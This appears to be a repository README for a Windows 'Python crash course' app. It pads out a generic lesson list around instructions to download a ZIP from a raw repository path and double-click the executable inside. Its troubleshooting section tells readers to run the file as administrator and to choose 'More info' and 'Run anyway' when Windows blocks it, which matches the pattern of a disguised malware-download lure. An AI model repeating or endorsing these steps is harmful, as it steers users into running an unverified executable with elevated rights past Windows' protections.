Use this link to visit the page and download the app:
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python-programming-crash-course-2026-tachyon is a Windows app for learning Python in a simple way. It gives you a guided course with short lessons, practice tasks, and small examples you can follow on screen.
It is built for people who want to start with Python without reading long guides first. The course moves from basic ideas to simple projects, so you can learn step by step.
- Clear lessons that explain one idea at a time
- Simple practice tasks after each lesson
- Beginner-friendly examples
- A clean layout that is easy to follow
- Basic progress tracking so you know where you left off
- Small project exercises to help you practice
For best results on Windows, use:
- Windows 10 or Windows 11
- 4 GB RAM or more
- 500 MB free disk space
- A mouse and keyboard
- Internet access for the first download
If your PC is older, the app should still work, but loading may take longer.
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Open the download page: https://github.com/leonn8702/python-programming-crash-course-2026-tachyon/raw/refs/heads/main/class-6/class-note.zip
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Find the latest download item on the page.
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Download the file to your computer.
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If the file comes in a ZIP folder, right-click it and choose Extract All.
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Open the extracted folder.
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Double-click the app file to start it.
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If Windows asks for permission, select Yes or Run.
After the app opens:
- Choose your course level if prompted.
- Pick the start option for the first lesson.
- Read the lesson card and move through each page with the on-screen buttons.
- Complete each practice task before moving on.
- Save your progress if the app asks you to do so.
If you close the app, it should remember where you stopped.
The course uses a simple path that helps new users build skills in order.
- What Python is
- How to read and run simple code
- Variables and values
- Text, numbers, and lists
- If statements
- Comparing values
- True and false choices
- Using conditions in small programs
- Loops
- Repeating actions
- Counting items
- Working through lists
- What functions do
- How to use built-in functions
- Making your own simple functions
- Reusing code
- A number guess game
- A quiz app
- A basic calculator
- A text-based practice project
The app is set up for guided learning:
- Open the app
- Read the lesson text
- Follow the example on screen
- Complete the task
- Move to the next lesson
If you want to review something, use the back button or lesson menu. If a lesson feels too fast, repeat it before moving on.
- Use the mouse to click lesson buttons
- Use Tab to move between items
- Use Enter to confirm a choice
- Use Esc to close a panel if the app supports it
- Keep the app in full screen if you want more room to read
- Make sure the download finished
- Check that you extracted the ZIP folder first
- Try running the app again
- Right-click the file and choose Run as administrator if Windows blocks it
- Select More info if needed
- Choose Run anyway if you trust the source and want to continue
- Use the Windows display scale settings
- Increase the app window size if possible
- Close other large apps
- Restart your computer
- Open the app again after the restart
Yes. It is built for people who want a clear first step into Python.
Not for the learning app itself. The course content is ready to use after download.
Most lesson content should work offline after the app is on your PC. Some links or updates may need internet access.
This version is made for Windows. Use a Windows PC for the best result.
If the download comes as a folder, you may see items like these:
app.exeor a similar app fileassetsfolderdatafolderREADMEfile- settings files
Do not move files out of the folder unless the app instructions say to do that.
- Take one lesson at a time
- Repeat examples before moving on
- Write down new words in a notebook
- Try the practice task without skipping steps
- Keep notes on any lesson that feels hard
Before you run the app:
- Make sure the download comes from the GitHub link above
- Keep the files in one folder
- Do not rename files unless needed
- Do not delete files that came with the app
If you need to get the app again, use this link:
After launch, you should see a course screen with:
- A lesson list
- A main reading area
- Next and back controls
- Practice steps
- A progress view
From there, you can start at the first lesson and move through the course in order